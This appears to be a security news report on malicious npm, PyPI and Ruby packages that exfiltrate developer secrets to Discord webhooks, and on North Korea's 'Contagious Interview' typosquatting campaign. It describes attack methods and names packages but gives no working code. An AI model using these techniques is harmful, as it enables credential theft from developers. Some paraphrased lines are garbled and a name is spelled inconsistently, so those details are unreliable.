Cybersecurity researchers have identified several malicious packages across the npm, Python, and Ruby ecosystems that leverage Discord as a command-and-control (C2) channel to send stolen data to actor-controlled webhooks.
Discord’s webhooks are a way to post messages to channels within the platform without requiring bot users or authentication, making them an attractive mechanism for attackers to exfiltrate data into channels under their control.
“The important thing is that webhook URLs are effectively write-only,” sockets researcher Olivia Brown said in her analysis. “Channel history is not made public, and defenders cannot reread previous posts just by knowing the URL.”
The software supply chain security company announced that it has identified a number of packages that use Discord webhooks in a variety of ways.
mysql-dumpdiscord (npm). Siphon the contents of developer configuration files such as config.json, .env, ayarlar.js, ayarlar.json into a Discord webhook. nodejs.discord (npm). Discord webhooks may be used to log alerts (an approach that is not inherently malicious). malinssx, malicus, and maliinn (PyPI), using Discord as a C2 server by triggering an HTTP request to a channel whenever a package is installed using “pip install”.
“Exploiting Discord webhooks as a C2 is important because it reverses the economics of supply chain attacks,” Brown noted. “Because it’s free and fast, threat actors avoid hosting and maintaining their own infrastructure. They’re also often slipped into regular code and firewall rules, allowing them to be stolen even from secure victims.”
“When combined with install-time hooks and build scripts, a malicious package with the Discord C2 mechanism can silently siphon .env files, API keys, and host details from developer machines and CI runners long before runtime monitoring is aware of the app.”
Contagious Interview floods npm with fake packages
This disclosure comes after the company also flagged 338 malicious packages published by North Korean threat actors associated with the Contagious Interview campaign, reporting that rather than directly dropping JavaScript stealers and downloaders, they were being used to deliver cryptographic loaders that delivered malware families such as HexEval, XORIndex, and BeaverTail. In total, the package was downloaded more than 50,000 times.
“In this latest wave, North Korean threat actors executed more than a dozen command-and-control (C2) endpoints using more than 180 fake personas tied to new npm aliases and registration emails,” security researcher Kirill Boichenko said.
Targets of this campaign include Web3, cryptocurrency and blockchain developers, as well as job seekers in the technology sector, who will be approached for high-paying opportunities on professional platforms such as LinkedIn. Targeted candidates are then instructed to complete a coding assignment by cloning a booby-trapped repository that references a malicious package (such as eslint-detector) that has already been published to the npm registry.
When run locally on a machine, the package referenced in the assumed project acts as a stealer (i.e. BeaverTail) and collects browser credentials, cryptocurrency wallet data, macOS keychain, keystrokes, clipboard contents, and screenshots. The malware is designed to download additional payloads, including a cross-platform Python backdoor codenamed InvisibleFerret.
Of the hundreds of packages uploaded by North Korean attackers, many are typosquats of legitimate packages (such as dotevn and dotenv), particularly those related to front-end frameworks such as Node.js, Express, or React. Some of the identified libraries were also found to be similar to the Web3 kit (such as ethrs.js and ethers.js).
“Contagious interviews operate more like an assembly line or factory model supply chain threat than a cybercriminal hobby,” Boychenko said. “This is a state-led, quota-driven operation using permanent resources, not weekend staff, and it is not enough to simply remove malicious packages if the associated publisher accounts remain active.”
“This campaign trajectory demonstrates a durable, factory-style operation that treats the npm ecosystem as a renewable early access channel.”
Source link
